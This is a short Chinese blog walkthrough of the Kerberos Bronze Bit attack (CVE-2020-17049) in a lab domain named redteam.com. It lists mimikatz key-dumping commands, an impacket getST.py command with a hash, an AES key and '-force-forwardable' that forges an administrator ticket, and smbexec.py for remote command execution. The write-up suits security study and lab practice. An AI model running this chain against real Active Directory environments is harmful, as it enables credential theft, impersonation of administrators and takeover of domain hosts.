Kerberos Bronze Bit Attack(CVE-2020-17049)
一、漏洞介绍
漏洞主要是为了解决:禁止协议转换/协议过渡、受保护的用户和敏感用户不能被委派
二、约束委派绕过
server.redteam.com
wsus.redteam.com
设置server对wsus服务进行委派(用户或计算机选择为WSUS)
设置一个服务账户:setspn -A MSSQLSvc/Service.redteam.com:1433 sql
spn服务账户sql设置为“敏感用户不能被委派”或者添加到“受保护的组”中
尝试常规的约束委派利用,出现报错这是因为“敏感用户不能被委派”和“受保护的组”的原因
尝试Kerberos Bronze Bit Attack攻击,攻击需要获取到server主机的hash与aeskey
privilege::debug
sekurlsa::ekeys
KALI修改vim /etc/resolv.conf dns为域控主机ip
python3 getST.py -spn cifs/wsus.redteam.com -impersonate administrator -hashes AAD3B435B51404EEAAD3B435B51404EE(这里是lmhash可以任意填写):7f4b4bf82a56f59a5ea4441a71cee4e0 -aesKey 93c99dc00e6ba904751414be3cd99375820cb1bc1d33cdeaf63391f7ccb90456 redteam.com/server -force-forwardable
export KRB5CCNAME=administrator.ccache
python3 smbexec.py -no-pass -k wsus.redteam.com
本文来自博客园,作者:aoaoaoao,转载请注明原文链接:https://www.cnblogs.com/websecyw/p/14566644.html
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构